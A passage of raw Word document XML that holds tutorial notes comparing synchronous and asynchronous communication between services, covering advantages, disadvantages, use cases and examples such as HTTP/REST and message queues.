      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simpler Error Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Errors can be handled directly in the response, simplifying the error-handling logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53983C39" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Easier Debugging:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Straightforward to debug as the request and response are directly linked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124B277C"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Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68366C2D" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Latency Issues:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The performance is tied to the response time of the called service. High latency in one service can impact the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0FA07" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scalability Concerns:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Can lead to bottlenecks and reduced scalability as each request ties up resources until a response is received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E4A5CC" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tight Coupling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Services are more tightly coupled, as the client depends on the availability and performance of the service it is calling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B97959"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Common Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57711715" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User-facing applications where immediate responses are required (e.g., web applications, real-time queries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288F72F9" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Situations where operations need to be completed in a specific order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A74FA"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37A66F57" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="325"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HTTP/REST:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A client makes an HTTP request to a server and waits for the server to respond with the requested data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070A3241" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Asynchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D368C54"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B24C82" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="326"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In asynchronous communication, a service sends a request to another service and does not wait for an immediate response. Instead, it continues its operations and may receive the response later through a callback or by polling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DD078"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3831B" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The client does not wait for a response and can continue processing other tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE971DB" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decoupling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Services are loosely coupled, as the client and server do not need to be available at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1D099" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event-Driven:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Often involves event-driven architectures where responses or results are delivered through events, messages, or notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126C691B"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Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6408FD62" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improved Scalability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Services can scale independently, and the system can handle high volumes of requests more efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ED8ADE" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fault Tolerance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> More resilient to failures as the client and server are not directly tied to each other’s availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF5408F" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reduced Latency Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Client performance is less affected by the latency of individual services, as it does not need to wait for immediate responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BAACF4"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Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1189E1FD" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complex Error Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Error handling can be more complex as responses are received later or via separate channels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AF561D" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Increased Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Requires additional mechanisms for handling responses, timeouts, and retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E878101" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eventual Consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data might not be immediately consistent across services, leading to eventual consistency models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D07E9"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Common Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D55BEB" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Background processing and tasks where immediate results are not required (e.g., email notifications, batch processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38344440" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Systems where decoupling and scalability are important (e.g., messaging systems, event-driven architectures).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482B2B15"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3B20AAAF" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Message Queues (e.g., RabbitMQ, Kafka):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A service sends a message to a queue or topic, and other services consume the message and process it asynchronously. The original service does not wait for the processing to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F40BE2F" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="1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3498"/>
        <w:gridCol w:w="3795"/>
      </w:tblGrid>
      <w:tr w:rsidR="00993446" w:rsidRPr="00DA2F32" w14:paraId="559B63D9" w14:textId="77777777" w:rsidTr="00993446">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21CCFD46" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="501D24FF" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Synchronous Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="092117D1" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Asynchronous Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993446" w:rsidRPr="00DA2F32" w14:paraId="213E26C3" w14:textId="77777777" w:rsidTr="00993446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
